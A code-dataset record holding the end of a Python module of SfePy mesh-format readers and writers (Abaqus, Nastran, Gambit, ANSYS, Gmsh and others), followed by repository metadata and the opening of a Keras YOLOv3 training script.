assert_((fd.root.last_step[0] + 1) == ts.n_step)
ths = dict_from_keys_init(var_names, list)
arr = nm.asarray
for step in xrange(ts.n_step):
gr_name = 'step%d' % step
step_group = fd.getNode(fd.root, gr_name)
name_dict = step_group._v_attrs.name_dict
for var_name in var_names:
data = step_group._f_getChild(name_dict[var_name]).data
ths[var_name].append(arr(data.read()))
fd.close()
return ths
class MEDMeshIO(MeshIO):
format = "med"
def read(self, mesh, **kwargs):
fd = pt.openFile(self.filename, mode="r")
mesh_root = fd.root.ENS_MAA
#TODO: Loop through multiple meshes?
mesh_group = mesh_root._f_getChild(mesh_root._v_groups.keys()[0])
if not ('NOE' in mesh_group._v_groups.keys()):
mesh_group = mesh_group._f_getChild(mesh_group._v_groups.keys()[0])
mesh.name = mesh_group._v_name
aux_coors = mesh_group.NOE.COO.read()
n_nodes = mesh_group.NOE.COO.getAttr('NBR')
# Unflatten the node coordinate array
dim = aux_coors.shape[0] / n_nodes
coors = nm.zeros((n_nodes,dim), dtype=nm.float64)
for ii in range(dim):
coors[:,ii] = aux_coors[n_nodes*ii:n_nodes*(ii+1)]
ngroups = mesh_group.NOE.FAM.read()
assert_((ngroups >= 0).all())
# Dict to map MED element names to SfePy descs
#NOTE: The commented lines are elements which
# produce KeyError in SfePy
med_descs = {
'TE4' : '3_4',
#'T10' : '3_10',
#'PY5' : '3_5',
#'P13' : '3_13',
'HE8' : '3_8',
#'H20' : '3_20',
#'PE6' : '3_6',
#'P15' : '3_15',
#TODO: Polyhedrons (POE) - need special handling
'TR3' : '2_3',
#'TR6' : '2_6',
'QU4' : '2_4',
#'QU8' : '2_8',
#TODO: Polygons (POG) - need special handling
#'SE2' : '1_2',
#'SE3' : '1_3',
}
conns = []
descs = []
mat_ids = []
for md, desc in med_descs.iteritems():
if int(desc[0]) != dim: continue
try:
group = mesh_group.MAI._f_getChild(md)
aux_conn = group.NOD.read()
n_conns = group.NOD.getAttr('NBR')
# (0 based indexing in numpy vs. 1 based in MED)
nne = aux_conn.shape[0] / n_conns
conn = nm.zeros((n_conns,nne), dtype=nm.int32)
for ii in range(nne):
conn[:,ii] = aux_conn[n_conns*ii:n_conns*(ii+1)] - 1
conns.append(conn)
mat_id = group.FAM.read()
assert_((mat_id <= 0).all())
mat_id = nm.abs(mat_id)
mat_ids.append(mat_id)
descs.append(med_descs[md])
except pt.exceptions.NoSuchNodeError:
pass
fd.close()
mesh._set_io_data(coors, ngroups, conns, mat_ids, descs)
return mesh
class Mesh3DMeshIO(MeshIO):
format = "mesh3d"
def read(self, mesh, **kwargs):
f = open(self.filename)
# read the whole file:
vertices = self._read_section(f, integer=False)
tetras = self._read_section(f)
hexes = self._read_section(f)
prisms = self._read_section(f)
tris = self._read_section(f)
quads = self._read_section(f)
# substract 1 from all elements, because we count from 0:
conns = []
mat_ids = []
descs = []
if len(tetras) > 0:
conns.append(tetras - 1)
mat_ids.append([0]*len(tetras))
descs.append("3_4")
if len(hexes) > 0:
conns.append(hexes - 1)
mat_ids.append([0]*len(hexes))
descs.append("3_8")
mesh._set_io_data(vertices, None, conns, mat_ids, descs)
return mesh
def read_dimension(self):
return 3
def _read_line(self, f):
"""
Reads one non empty line (if it's a comment, it skips it).
"""
l = f.readline().strip()
while l == "" or l[0] == "#": # comment or an empty line
l = f.readline().strip()
return l
def _read_section(self, f, integer=True):
"""
Reads one section from the mesh3d file.
integer ... if True, all numbers are passed to int(), otherwise to
float(), before returning
Some examples how a section can look like:
2
1 2 5 4 7 8 11 10
2 3 6 5 8 9 12 11
or
5
1 2 3 4 1
1 2 6 5 1
2 3 7 6 1
3 4 8 7 1
4 1 5 8 1
or
0
"""
if integer:
dtype=int
else:
dtype=float
l = self._read_line(f)
N = int(l)
rows = []
for i in range(N):
l = self._read_line(f)
row = nm.fromstring(l, sep=" ", dtype=dtype)
rows.append(row)
return nm.array(rows)
def mesh_from_groups(mesh, ids, coors, ngroups,
tris, mat_tris, quads, mat_quads,
tetras, mat_tetras, hexas, mat_hexas, remap=None):
ids = nm.asarray(ids, dtype=nm.int32)
coors = nm.asarray(coors, dtype=nm.float64)
if remap is None:
n_nod = coors.shape[0]
remap = nm.zeros((ids.max()+1,), dtype=nm.int32)
remap[ids] = nm.arange(n_nod, dtype=nm.int32)
tris = remap[nm.array(tris, dtype=nm.int32)]
quads = remap[nm.array(quads, dtype=nm.int32)]
tetras = remap[nm.array(tetras, dtype=nm.int32)]
hexas = remap[nm.array(hexas, dtype=nm.int32)]
conns = [tris, quads, tetras, hexas]
mat_ids = [nm.array(ar, dtype=nm.int32)
for ar in [mat_tris, mat_quads, mat_tetras, mat_hexas]]
descs = ['2_3', '2_4', '3_4', '3_8']
# Remove empty groups.
conns, mat_ids, descs = zip(*[(conns[ig], mat_ids[ig], descs[ig])
for ig in xrange(4)
if conns[ig].shape[0] > 0])
mesh._set_io_data(coors, ngroups, conns, mat_ids, descs)
return mesh
class AVSUCDMeshIO(MeshIO):
format = 'avs_ucd'
@staticmethod
def guess(filename):
return True
def read(self, mesh, **kwargs):
fd = open(self.filename, 'r')
# Skip all comments.
while 1:
line = fd.readline()
if line and (line[0] != '#'):
break
header = [int(ii) for ii in line.split()]
n_nod, n_el = header[0:2]
ids = nm.zeros((n_nod,), dtype=nm.int32)
dim = 3
coors = nm.zeros((n_nod, dim), dtype=nm.float64)
for ii in xrange(n_nod):
line = fd.readline().split()
ids[ii] = int(line[0])
coors[ii] = [float(coor) for coor in line[1:]]
mat_tetras = []
tetras = []
mat_hexas = []
hexas = []
for ii in xrange(n_el):
line = fd.readline().split()
if line[2] == 'tet':
mat_tetras.append(int(line[1]))
tetras.append([int(ic) for ic in line[3:]])
elif line[2] == 'hex':
mat_hexas.append(int(line[1]))
hexas.append([int(ic) for ic in line[3:]])
fd.close()
mesh = mesh_from_groups(mesh, ids, coors, None,
[], [], [], [],
tetras, mat_tetras, hexas, mat_hexas)
return mesh
def read_dimension(self):
return 3
def write(self, filename, mesh, out=None, **kwargs):
raise NotImplementedError
class HypermeshAsciiMeshIO(MeshIO):
format = 'hmascii'
def read(self, mesh, **kwargs):
fd = open(self.filename, 'r')
ids = []
coors = []
tetras = []
mat_tetras = []
hexas = []
mat_hexas = []
quads = []
mat_quads = []
trias = []
mat_trias = []
mat_id = 0
for line in fd:
if line and (line[0] == '*'):
if line[1:10] == 'component':
line = line.strip()[11:-1].split(',')
mat_id = int(line[0])
if line[1:5] == 'node':
line = line.strip()[6:-1].split(',')
ids.append(int(line[0]))
coors.append([float(coor) for coor in line[1:4]])
elif line[1:7] == 'tetra4':
line = line.strip()[8:-1].split(',')
mat_tetras.append(mat_id)
tetras.append([int(ic) for ic in line[2:6]])
elif line[1:6] == 'hexa8':
line = line.strip()[7:-1].split(',')
mat_hexas.append(mat_id)
hexas.append([int(ic) for ic in line[2:10]])
elif line[1:6] == 'quad4':
line = line.strip()[7:-1].split(',')
mat_quads.append(mat_id)
quads.append([int(ic) for ic in line[2:6]])
elif line[1:6] == 'tria3':
line = line.strip()[7:-1].split(',')
mat_trias.append(mat_id)
trias.append([int(ic) for ic in line[2:5]])
fd.close()
mesh = mesh_from_groups(mesh, ids, coors, None,
trias, mat_trias, quads, mat_quads,
tetras, mat_tetras, hexas, mat_hexas)
return mesh
def read_dimension(self):
return 3
def write(self, filename, mesh, out=None, **kwargs):
raise NotImplementedError
class AbaqusMeshIO(MeshIO):
format = 'abaqus'
@staticmethod
def guess(filename):
ok = False
fd = open(filename, 'r')
for ii in xrange(100):
try:
line = fd.readline().strip().split(',')
except:
break
if line[0].lower() == '*node':
ok = True
break
fd.close()
return ok
def read(self, mesh, **kwargs):
fd = open(self.filename, 'r')
ids = []
coors = []
tetras = []
mat_tetras = []
hexas = []
mat_hexas = []
tris = []
mat_tris = []
quads = []
mat_quads = []
nsets = {}
ing = 1
dim = 0
line = fd.readline().split(',')
while 1:
if not line[0]: break
token = line[0].strip().lower()
if token == '*node':
while 1:
line = fd.readline().split(',')
if (not line[0]) or (line[0][0] == '*'): break
if dim == 0:
dim = len(line) - 1
ids.append(int(line[0]))
if dim == 2:
coors.append([float(coor) for coor in line[1:3]])
else:
coors.append([float(coor) for coor in line[1:4]])
elif token == '*element':
if line[1].find('C3D8') >= 0:
while 1:
line = fd.readline().split(',')
if (not line[0]) or (line[0][0] == '*'): break
mat_hexas.append(0)
hexas.append([int(ic) for ic in line[1:9]])
elif line[1].find('C3D4') >= 0:
while 1:
line = fd.readline().split(',')
if (not line[0]) or (line[0][0] == '*'): break
mat_tetras.append(0)
tetras.append([int(ic) for ic in line[1:5]])
elif line[1].find('CPS') >= 0 or line[1].find('CPE') >= 0:
if line[1].find('4') >= 0:
while 1:
line = fd.readline().split(',')
if (not line[0]) or (line[0][0] == '*'): break
mat_quads.append(0)
quads.append([int(ic) for ic in line[1:5]])
elif line[1].find('3') >= 0:
while 1:
line = fd.readline().split(',')
if (not line[0]) or (line[0][0] == '*'): break
mat_tris.append(0)
tris.append([int(ic) for ic in line[1:4]])
else:
raise ValueError('unknown element type! (%s)' % line[1])
else:
raise ValueError('unknown element type! (%s)' % line[1])
elif token == '*nset':
if line[-1].strip().lower() == 'generate':
line = fd.readline()
continue
while 1:
line = fd.readline().strip().split(',')
if (not line[0]) or (line[0][0] == '*'): break
if not line[-1]: line = line[:-1]
aux = [int(ic) for ic in line]
nsets.setdefault(ing, []).extend(aux)
ing += 1
else:
line = fd.readline().split(',')
fd.close()
ngroups = nm.zeros((len(coors),), dtype=nm.int32)
for ing, ii in nsets.iteritems():
ngroups[nm.array(ii)-1] = ing
mesh = mesh_from_groups(mesh, ids, coors, ngroups,
tris, mat_tris, quads, mat_quads,
tetras, mat_tetras, hexas, mat_hexas)
return mesh
def read_dimension(self):
fd = open(self.filename, 'r')
line = fd.readline().split(',')
while 1:
if not line[0]: break
token = line[0].strip().lower()
if token == '*node':
while 1:
line = fd.readline().split(',')
if (not line[0]) or (line[0][0] == '*'): break
dim = len(line) - 1
fd.close()
return dim
def write(self, filename, mesh, out=None, **kwargs):
raise NotImplementedError
class BDFMeshIO(MeshIO):
format = 'nastran'
def read_dimension(self, ret_fd=False):
fd = open(self.filename, 'r')
el3d = 0
while 1:
try:
line = fd.readline()
except:
output("reading " + fd.name + " failed!")
raise
if len(line) == 1: continue
if line[0] == '$': continue
aux = line.split()
if aux[0] == 'CHEXA':
el3d += 1
elif aux[0] == 'CTETRA':
el3d += 1
if el3d > 0:
dim = 3
else:
dim = 2
if ret_fd:
return dim, fd
else:
fd.close()
return dim
def read(self, mesh, **kwargs):
def mfloat(s):
if len(s) > 3:
if s[-3] == '-':
return float(s[:-3]+'e'+s[-3:])
return float(s)
import string
fd = open(self.filename, 'r')
el = {'3_8' : [], '3_4' : [], '2_4' : [], '2_3' : []}
nod = []
cmd = ''
dim = 2
conns_in = []
descs = []
node_grp = None
while 1:
try:
line = fd.readline()
except EOFError:
break
except:
output("reading " + fd.name + " failed!")
raise
if (len(line) == 0): break
if len(line) < 4: continue
if line[0] == '$': continue
row = line.strip().split()
if row[0] == 'GRID':
cs = line.strip()[-24:]
aux = [ cs[0:8], cs[8:16], cs[16:24] ]
nod.append([mfloat(ii) for ii in aux]);
elif row[0] == 'GRID*':
aux = row[1:4];
cmd = 'GRIDX';
elif row[0] == 'CHEXA':
aux = [int(ii)-1 for ii in row[3:9]]
aux2 = int(row[2])
aux3 = row[9]
cmd ='CHEXAX'
elif row[0] == 'CTETRA':
aux = [int(ii)-1 for ii in row[3:]]
aux.append(int(row[2]))
el['3_4'].append(aux)
dim = 3
elif row[0] == 'CQUAD4':
aux = [int(ii)-1 for ii in row[3:]]
aux.append(int(row[2]))
el['2_4'].append(aux)
elif row[0] == 'CTRIA3':
aux = [int(ii)-1 for ii in row[3:]]
aux.append(int(row[2]))
el['2_3'].append(aux)
elif cmd == 'GRIDX':
cmd = ''
aux2 = row[1]
if aux2[-1] == '0':
aux2 = aux2[:-1]
aux3 = aux[1:]
aux3.append(aux2)
nod.append([float(ii) for ii in aux3]);
elif cmd == 'CHEXAX':
cmd = ''
aux4 = row[0]
aux5 = string.find(aux4, aux3)
aux.append(int(aux4[(aux5+len(aux3)):])-1)
aux.extend([int(ii)-1 for ii in row[1:]])
aux.append(aux2)
el['3_8'].append(aux)
dim = 3
elif row[0] == 'SPC' or row[0] == 'SPC*':
if node_grp is None:
node_grp = [0] * len(nod)
node_grp[int(row[2]) - 1] = int(row[1])
for elem in el.keys():
if len(el[elem]) > 0:
conns_in.append(el[elem])
descs.append(elem)
fd.close()
nod = nm.array(nod, nm.float64)
if dim == 2:
nod = nod[:,:2].copy()
conns, mat_ids = split_conns_mat_ids(conns_in)
mesh._set_io_data(nod, node_grp, conns, mat_ids, descs)
return mesh
@staticmethod
def format_str(str, idx, n=8):
out = ''
for ii, istr in enumerate(str):
aux = '%d' % istr
out += aux + ' ' * (n - len(aux))
if ii == 7:
out += '+%07d\n+%07d' % (idx, idx)
return out
def write(self, filename, mesh, out=None, **kwargs):
fd = open(filename, 'w')
coors, ngroups, conns, mat_ids, desc = mesh._get_io_data()
n_nod, dim = coors.shape
fd.write("$NASTRAN Bulk Data File created by SfePy\n")
fd.write("$\nBEGIN BULK\n")
fd.write("$\n$ ELEMENT CONNECTIVITY\n$\n")
iel = 0
mats = {}
for ig, conn in enumerate(conns):
ids = mat_ids[ig]
for ii in range(conn.shape[0]):
iel += 1
nn = conn[ii] + 1
mat = ids[ii]
if mat in mats:
mats[mat] += 1
else:
mats[mat] = 0
if (desc[ig] == "2_4"):
fd.write("CQUAD4 %s\n" %\
self.format_str([ii + 1, mat,
nn[0], nn[1], nn[2], nn[3]],
iel))
elif (desc[ig] == "2_3"):
fd.write("CTRIA3 %s\n" %\
self.format_str([ii + 1, mat,
nn[0], nn[1], nn[2]], iel))
elif (desc[ig] == "3_4"):
fd.write("CTETRA %s\n" %\
self.format_str([ii + 1, mat,
nn[0], nn[1], nn[2], nn[3]],
iel))
elif (desc[ig] == "3_8"):
fd.write("CHEXA %s\n" %\
self.format_str([ii + 1, mat, nn[0], nn[1], nn[2],
nn[3], nn[4], nn[5], nn[6],
nn[7]], iel))
else:
raise ValueError('unknown element type! (%s)' % desc[ig])
fd.write("$\n$ NODAL COORDINATES\n$\n")
format = 'GRID* %s % 08E % 08E\n'
if coors.shape[1] == 3:
format += '* % 08E0 \n'
else:
format += '* % 08E0 \n' % 0.0
for ii in range(n_nod):
sii = str(ii + 1)
fd.write(format % ((sii + ' ' * (8 - len(sii)),)
+ tuple(coors[ii])))
fd.write("$\n$ GEOMETRY\n$\n1 ")
fd.write("0.000000E+00 0.000000E+00\n")
fd.write("* 0.000000E+00 0.000000E+00\n* \n")
fd.write("$\n$ MATERIALS\n$\n")
matkeys = mats.keys()
matkeys.sort()
for ii, imat in enumerate(matkeys):
fd.write("$ material%d : Isotropic\n" % imat)
aux = str(imat)
fd.write("MAT1* %s " % (aux + ' ' * (8 - len(aux))))
fd.write("0.000000E+00 0.000000E+00\n")
fd.write("* 0.000000E+00 0.000000E+00\n")
fd.write("$\n$ GEOMETRY\n$\n")
for ii, imat in enumerate(matkeys):
fd.write("$ material%d : solid%d\n" % (imat, imat))
fd.write("PSOLID* %s\n" % self.format_str([ii + 1, imat], 0, 16))
fd.write("* \n")
fd.write("ENDDATA\n")
fd.close()
class NEUMeshIO(MeshIO):
format = 'gambit'
def read_dimension(self, ret_fd=False):
fd = open(self.filename, 'r')
row = fd.readline().split()
while 1:
if not row: break
if len(row) == 0: continue
if (row[0] == 'NUMNP'):
row = fd.readline().split()
n_nod, n_el, dim = row[0], row[1], int(row[4])
break;
if ret_fd:
return dim, fd
else:
fd.close()
return dim
def read(self, mesh, **kwargs):
el = {'3_8' : [], '3_4' : [], '2_4' : [], '2_3' : []}
nod = []
conns_in = []
descs = []
group_ids = []
group_n_els = []
groups = []
nodal_bcs = {}
fd = open(self.filename, 'r')
row = fd.readline()
while 1:
if not row: break
row = row.split()
if len(row) == 0:
row = fd.readline()
continue
if (row[0] == 'NUMNP'):
row = fd.readline().split()
n_nod, n_el, dim = int(row[0]), int(row[1]), int(row[4])
elif (row[0] == 'NODAL'):
row = fd.readline().split()
while not(row[0] == 'ENDOFSECTION'):
nod.append(row[1:])
row = fd.readline().split()
elif (row[0] == 'ELEMENTS/CELLS'):
row = fd.readline().split()
while not(row[0] == 'ENDOFSECTION'):
elid = [row[0]]
gtype = int(row[1])
if gtype == 6:
el['3_4'].append(row[3:]+elid)
elif gtype == 4:
rr = row[3:]
if (len(rr) < 8):
rr.extend(fd.readline().split())
el['3_8'].append(rr+elid)
elif gtype == 3:
el['2_3'].append(row[3:]+elid)
elif gtype == 2:
el['2_4'].append(row[3:]+elid)
row = fd.readline().split()
elif (row[0] == 'GROUP:'):
group_ids.append(row[1])
g_n_el = int(row[3])
group_n_els.append(g_n_el)
name = fd.readline().strip()
els = []
row = fd.readline().split()
row = fd.readline().split()
while not(row[0] == 'ENDOFSECTION'):
els.extend(row)
row = fd.readline().split()
if g_n_el != len(els):
msg = 'wrong number of group elements! (%d == %d)'\
% (n_el, len(els))
raise ValueError(msg)
groups.append(els)
elif (row[0] == 'BOUNDARY'):
row = fd.readline().split()
key = row[0]
num = int(row[2])
inod = read_array(fd, num, None, nm.int32) - 1
nodal_bcs[key] = inod.squeeze()
row = fd.readline().split()
assert_(row[0] == 'ENDOFSECTION')
row = fd.readline()
fd.close()
if int(n_el) != sum(group_n_els):
print 'wrong total number of group elements! (%d == %d)'\
% (int(n_el), len(group_n_els))
mat_ids = nm.zeros(n_el, dtype=nm.int32)
for ii, els in enumerate(groups):
els = nm.array(els, dtype=nm.int32)
mat_ids[els - 1] = group_ids[ii]
for elem in el.keys():
if len(el[elem]) > 0:
els = nm.array(el[elem], dtype=nm.int32)
els[:, :-1] -= 1
els[:, -1] = mat_ids[els[:, -1]-1]
if elem == '3_8':
els = els[:, [0, 1, 3, 2, 4, 5, 7, 6, 8]]
conns_in.append(els)
descs.append(elem)
nod = nm.array(nod, nm.float64)
conns, mat_ids = split_conns_mat_ids(conns_in)
mesh._set_io_data(nod, None, conns, mat_ids, descs, nodal_bcs=nodal_bcs)
return mesh
def write(self, filename, mesh, out=None, **kwargs):
raise NotImplementedError
class ANSYSCDBMeshIO(MeshIO):
format = 'ansys_cdb'
@staticmethod
def guess(filename):
fd = open(filename, 'r')
for ii in xrange(1000):
row = fd.readline()
if not row: break
if len(row) == 0: continue
row = row.split(',')
kw = row[0].lower()
if (kw == 'nblock'):
ok = True
break
else:
ok = False
fd.close()
return ok
@staticmethod
def make_format(format):
idx = [];
dtype = [];
start = 0;
for iform in format:
ret = iform.partition('i')
if not ret[1]:
ret = iform.partition('e')
if not ret[1]:
raise ValueError
aux = ret[2].partition('.')
step = int(aux[0])
for j in range(int(ret[0])):
idx.append((start, start+step))
start += step
dtype.append(ret[1])
return idx, dtype
def write(self, filename, mesh, out=None, **kwargs):
raise NotImplementedError
def read_bounding_box(self):
raise NotImplementedError
def read_dimension(self, ret_fd=False):
return 3
def read(self, mesh, **kwargs):
ids = []
coors = []
tetras = []
hexas = []
qtetras = []
qhexas = []
nodal_bcs = {}
fd = open(self.filename, 'r')
while True:
row = fd.readline()
if not row: break
if len(row) == 0: continue
row = row.split(',')
kw = row[0].lower()
if (kw == 'nblock'):
# Solid keyword -> 3, otherwise 1 is the starting coors index.
ic = 3 if len(row) == 3 else 1
fmt = fd.readline()
fmt = fmt.strip()[1:-1].split(',')
idx, dtype = self.make_format(fmt)
ii0, ii1 = idx[0]
while True:
row = fd.readline()
if (row[0] == '!') or (row[:2] == '-1'):
break
line = [float(row[i0:i1]) for i0, i1 in idx[ic:]]
ids.append(int(row[ii0:ii1]))
coors.append(line)
elif (kw == 'eblock'):
if (len(row) <= 2) or row[2] != 'solid': # no solid keyword
continue
fmt = fd.readline()
fmt = [fmt.strip()[1:-1]]
idx, dtype = self.make_format(fmt)
imi0, imi1 = idx[0] # Material id.
inn0, inn1 = idx[8] # Number of nodes in line.
ien0, ien1 = idx[10] # Element number.
ic0 = 11
while True:
row = fd.readline()
if (row[0] == '!') or (row[:2] == '-1'):
break
line = [int(row[imi0:imi1])]
n_nod = int(row[inn0:inn1])
line.extend(int(row[i0:i1])
for i0, i1 in idx[ic0 : ic0 + n_nod])
if n_nod == 4:
tetras.append(line)
elif n_nod == 8:
hexas.append(line)
elif n_nod == 10:
row = fd.readline()
line.extend(int(row[i0:i1])
for i0, i1 in idx[:2])
qtetras.append(line)
elif n_nod == 20:
row = fd.readline()
line.extend(int(row[i0:i1])
for i0, i1 in idx[:12])
qhexas.append(line)
else:
raise ValueError('unsupported element type! (%d nodes)'
% n_nod)
elif kw == 'cmblock':
if row[2].lower() != 'node': # Only node sets support.
continue
n_nod = int(row[3])
fd.readline() # Format line not needed.
nods = read_array(fd, n_nod, 1, nm.int32)
nodal_bcs[row[1].strip()] = nods.ravel()
fd.close()
coors = nm.array(coors, dtype=nm.float64)
tetras = nm.array(tetras, dtype=nm.int32)
if len(tetras):
mat_ids_tetras = tetras[:, 0]
tetras = tetras[:, 1:]
else:
mat_ids_tetras = nm.array([])
hexas = nm.array(hexas, dtype=nm.int32)
if len(hexas):
mat_ids_hexas = hexas[:, 0]
hexas = hexas[:, 1:]
else:
mat_ids_hexas = nm.array([])
if len(qtetras):
qtetras = nm.array(qtetras, dtype=nm.int32)
tetras.shape = (max(0, tetras.shape[0]), 4)
tetras = nm.r_[tetras, qtetras[:, 1:5]]
mat_ids_tetras = nm.r_[mat_ids_tetras, qtetras[:, 0]]
if len(qhexas):
qhexas = nm.array(qhexas, dtype=nm.int32)
hexas.shape = (max(0, hexas.shape[0]), 8)
hexas = nm.r_[hexas, qhexas[:, 1:9]]
mat_ids_hexas = nm.r_[mat_ids_hexas, qhexas[:, 0]]
if len(qtetras) or len(qhexas):
ii = nm.union1d(tetras.ravel(), hexas.ravel())
n_nod = len(ii)
remap = nm.zeros((ii.max()+1,), dtype=nm.int32)
remap[ii] = nm.arange(n_nod, dtype=nm.int32)
ic = nm.searchsorted(ids, ii)
coors = coors[ic]
else:
n_nod = coors.shape[0]
remap = nm.zeros((nm.array(ids).max() + 1,), dtype=nm.int32)
remap[ids] = nm.arange(n_nod, dtype=nm.int32)
ngroups = nm.zeros(len(coors), dtype=nm.int32)
mesh = mesh_from_groups(mesh, ids, coors, ngroups,
[], [], [], [],
tetras, mat_ids_tetras,
hexas, mat_ids_hexas, remap=remap)
mesh.nodal_bcs = {}
for key, nods in nodal_bcs.iteritems():
mesh.nodal_bcs[key] = remap[nods]
return mesh
class Msh2MeshIO(MeshIO):
format = 'msh_v2'
msh_cells = {
1: (2, 2),
2: (2, 3),
3: (2, 4),
4: (3, 4),
5: (3, 8),
6: (3, 6),
}
prism2hexa = nm.asarray([0, 1, 2, 2, 3, 4, 5, 5])
def read_dimension(self, ret_fd=True):
fd = open(self.filename, 'r')
while 1:
lastpos = fd.tell()
line = skip_read_line(fd).split()
if line[0] in ['$Nodes', '$Elements']:
num = int(read_token(fd))
coors = read_array(fd, num, 4, nm.float64)
fd.seek(lastpos)
if nm.sum(nm.abs(coors[:,3])) < 1e-16:
dims = 2
else:
dims = 3
break
if line[0] == '$PhysicalNames':
num = int(read_token(fd))
dims = []
for ii in range(num):
dims.append(int(skip_read_line(fd, no_eof=True).split()[0]))
break
dim = nm.max(dims)
if ret_fd:
return dim, fd
else:
fd.close()
return dim
def read_bounding_box(self, ret_fd=False, ret_dim=False):
fd = open(self.filename, 'r')
dim, fd = self.read_dimension(ret_fd=True)
return _read_bounding_box(fd, dim, '$Nodes',
c0=1, ret_fd=ret_fd, ret_dim=ret_dim)
def read(self, mesh, omit_facets=True, **kwargs):
fd = open(self.filename, 'r')
conns = []
descs = []
mat_ids = []
tags = []
dims = []
while 1:
line = skip_read_line(fd).split()
if not line:
break
ls = line[0]
if ls == '$MeshFormat':
skip_read_line(fd)
elif ls == '$PhysicalNames':
num = int(read_token(fd))
for ii in range(num):
skip_read_line(fd)
elif ls == '$Nodes':
num = int(read_token(fd))
coors = read_array(fd, num, 4, nm.float64)
elif ls == '$Elements':
num = int(read_token(fd))
for ii in range(num):
line = [int(jj) for jj in skip_read_line(fd).split()]
if line[1] > 6:
continue
dimension, nc = self.msh_cells[line[1]]
dims.append(dimension)
ntag = line[2]
mat_id = line[3]
conn = line[(3 + ntag):]
desc = '%d_%d' % (dimension, nc)
if desc in descs:
idx = descs.index(desc)
conns[idx].append(conn)
mat_ids[idx].append(mat_id)
tags[idx].append(line[3:(3 + ntag)])
else:
descs.append(desc)
conns.append([conn])
mat_ids.append([mat_id])
tags.append(line[3:(3 + ntag)])
elif ls == '$Periodic':
periodic = ''
while 1:
pline = skip_read_line(fd)
if '$EndPeriodic' in pline:
break
else:
periodic += pline
elif line[0] == '#' or ls[:4] == '$End':
pass
else:
output('skipping unknown entity: %s' % line)
continue
fd.close()
dim = nm.max(dims)
if '3_6' in descs:
idx6 = descs.index('3_6')
c3_6as8 = nm.asarray(conns[idx6],
dtype=nm.int32)[:,self.prism2hexa]
if '3_8' in descs:
descs.pop(idx6)
c3_6m = nm.asarray(mat_ids.pop(idx6), type=nm.int32)
idx8 = descs.index('3_8')
c3_8 = nm.asarray(conns[idx8], type=nm.int32)
c3_8m = nm.asarray(mat_ids[idx8], type=nm.int32)
conns[idx8] = nm.vstack([c3_8, c3_6as8])
mat_ids[idx8] = nm.hstack([c3_8m, c3_6m])
else:
descs[idx6] = '3_8'
conns[idx6] = c3_6as8
descs0, mat_ids0, conns0 = [], [], []
for ii in range(len(descs)):
if int(descs[ii][0]) == dim:
conns0.append(nm.asarray(conns[ii], dtype=nm.int32) - 1)
mat_ids0.append(nm.asarray(mat_ids[ii], dtype=nm.int32))
descs0.append(descs[ii])
mesh._set_io_data(coors[:,1:], nm.int32(coors[:,-1] * 0),
conns0, mat_ids0, descs0)
return mesh
def guess_format(filename, ext, formats, io_table):
"""
Guess the format of filename, candidates are in formats.
"""
ok = False
for format in formats:
output('guessing %s' % format)
try:
ok = io_table[format].guess(filename)
except AttributeError:
pass
if ok: break
else:
raise NotImplementedError('cannot guess format of a *%s file!' % ext)
return format
var_dict = vars().items()
io_table = {}
for key, var in var_dict:
try:
if is_derived_class(var, MeshIO):
io_table[var.format] = var
except TypeError:
pass
del var_dict
def any_from_filename(filename, prefix_dir=None):
"""
Create a MeshIO instance according to the kind of `filename`.
Parameters
----------
filename : str, function or MeshIO subclass instance
The name of the mesh file. It can be also a user-supplied function
accepting two arguments: `mesh`, `mode`, where `mesh` is a Mesh
instance and `mode` is one of 'read','write', or a MeshIO subclass
instance.
prefix_dir : str
The directory name to prepend to `filename`.
Returns
-------
io : MeshIO subclass instance
The MeshIO subclass instance corresponding to the kind of `filename`.
"""
if not isinstance(filename, basestr):
if isinstance(filename, MeshIO):
return filename
else:
return UserMeshIO(filename)
ext = op.splitext(filename)[1].lower()
try:
format = supported_formats[ext]
except KeyError:
raise ValueError('unsupported mesh file suffix! (%s)' % ext)
if isinstance(format, tuple):
format = guess_format(filename, ext, format, io_table)
if prefix_dir is not None:
filename = op.normpath(op.join(prefix_dir, filename))
return io_table[format](filename)
insert_static_method(MeshIO, any_from_filename)
del any_from_filename
def for_format(filename, format=None, writable=False, prefix_dir=None):
"""
Create a MeshIO instance for file `filename` with forced `format`.
Parameters
----------
filename : str
The name of the mesh file.
format : str
One of supported formats. If None,
:func:`MeshIO.any_from_filename()` is called instead.
writable : bool
If True, verify that the mesh format is writable.
prefix_dir : str
The directory name to prepend to `filename`.
Returns
-------
io : MeshIO subclass instance
The MeshIO subclass instance corresponding to the `format`.
"""
ext = op.splitext(filename)[1].lower()
try:
_format = supported_formats[ext]
except KeyError:
_format = None
format = get_default(format, _format)
if format is None:
io = MeshIO.any_from_filename(filename, prefix_dir=prefix_dir)
else:
if not isinstance(format, basestr):
raise ValueError('ambigous suffix! (%s -> %s)' % (ext, format))
if format not in io_table:
raise ValueError('unknown output mesh format! (%s)' % format)
if writable and ('w' not in supported_capabilities[format]):
output_writable_meshes()
msg = 'write support not implemented for output mesh format "%s",' \
' see above!' % format
raise ValueError(msg)
if prefix_dir is not None:
filename = op.normpath(op.join(prefix_dir, filename))
io = io_table[format](filename)
return io
insert_static_method(MeshIO, for_format)
del for_format
| 32.187303
| 80
| 0.459331
|
c457502a4764c959ed4aa6b4bb79091323d01308
| 9,458
|
py
|
Python
|
train.py
|
17702513221/keras-yolov3
|
b0314c031812de29ceea89bd56c9da342f5c96c6
|
[
"MIT"
] | 3
|
2019-06-24T12:23:26.000Z
|
2020-04-04T09:09:17.000Z
|
train.py
|
17702513221/keras-yolov3
|
b0314c031812de29ceea89bd56c9da342f5c96c6
|
[
"MIT"
] | null | null | null |
train.py
|
17702513221/keras-yolov3
|
b0314c031812de29ceea89bd56c9da342f5c96c6
|
[
"MIT"
] | null | null | null |
"""
Retrain the YOLO model for your own dataset.
"""
import numpy as np
import keras.backend as K
from keras.layers import Input, Lambda
from keras.models import Model
from keras.optimizers import Adam
from keras.callbacks import TensorBoard, ModelCheckpoint, ReduceLROnPlateau, EarlyStopping
from yolo3.model import preprocess_true_boxes, yolo_body, tiny_yolo_body, yolo_loss
#功能:处理标注数据,限制最大框为20(同时也方便了拼接操作,详细原因后边解释)。
#该函数是用来做数据增强的,所有防止过拟合的数据预处理方法,都可以认为是数据增强,比如对小图像进行位移、放缩、翻转和颜色抖动调节等,它也有扩充数据集的作用
from yolo3.utils import get_random_data
def _main():
annotation_path = 'train.txt'
log_dir = 'logs/000/'
classes_path = 'model_data/voc_classes.txt'
anchors_path = 'model_data/yolo_anchors.txt'
class_names = get_classes(classes_path)
num_classes = len(class_names)
